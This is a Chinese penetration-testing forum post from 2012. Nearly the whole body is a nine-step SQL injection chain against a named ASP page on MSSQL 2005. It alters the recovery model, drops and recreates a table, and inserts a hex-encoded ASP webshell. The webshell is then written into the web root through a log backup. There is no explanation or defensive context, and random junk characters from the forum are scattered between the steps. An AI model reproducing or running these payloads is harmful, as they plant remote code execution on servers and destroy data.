中国网络渗透测试联盟
标题:
Mssql2005 Log备份Webshell
[打印本页]
作者:
admin
时间:
2012-9-15 14:25
标题:
Mssql2005 Log备份Webshell
第一步
. O" Y6 ]3 z) ^" L# @; } l" a( u
http://itpro.blog.163.com/test.asp';alter/
**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
" O3 t, p t/ G' V: Q" G$ V
' P* d2 O, F D7 ?" K
第二步:
- q r% p2 V/ I; S/ n
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
: i" V! p- b+ K+ E4 ?6 N; [
: e+ D- b7 p& n3 T* n9 `
第三步
1 o# Y$ N" z5 V
http://itpro.blog.163.com/test.asp';drop/
**/table/**/[itpro]--
. ]+ f; E0 i( b, h5 o# j, r c
/ Q. _; `+ w s7 S$ s8 O9 H2 _
第四步
% b" Z r. r8 [. P. f+ c' W
http://itpro.blog.163.com/test.asp';create/
**/table/**/[itpro]([a]/**/image)--
- Z* E: g7 l6 v! M
& g3 C. Z7 |$ R. @
第五步
1 j6 W" A) y8 k
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
7 G5 K! B: d0 k6 M& `
( l, {/ v; w, j+ A3 L" d
第六步
% A1 ], V. \9 t: W0 g$ G# {
http://itpro.blog.163.com/test.asp';insert/
**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
/ {9 l: l9 J( r
8 E t _2 s6 D7 m9 w
第七步
$ s0 Y5 Z6 r3 c. Y4 Z2 R
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
0 I* j! c6 D1 j9 b; c- V7 [
0 O' Y6 R. ~# j
第八步
6 x2 j; i( f1 J; M
http://itpro.blog.163.com/test.asp';drop/
**/table/**/[itpro]--
: I+ x- m& g( n# W4 E
3 e2 m# R) H3 v' p4 m: v e
第九步
7 y9 m/ F' Z& V8 ~( D( T
http://itpro.blog.163.com/test.asp';declare/
**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
, p- w% I' I" O
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2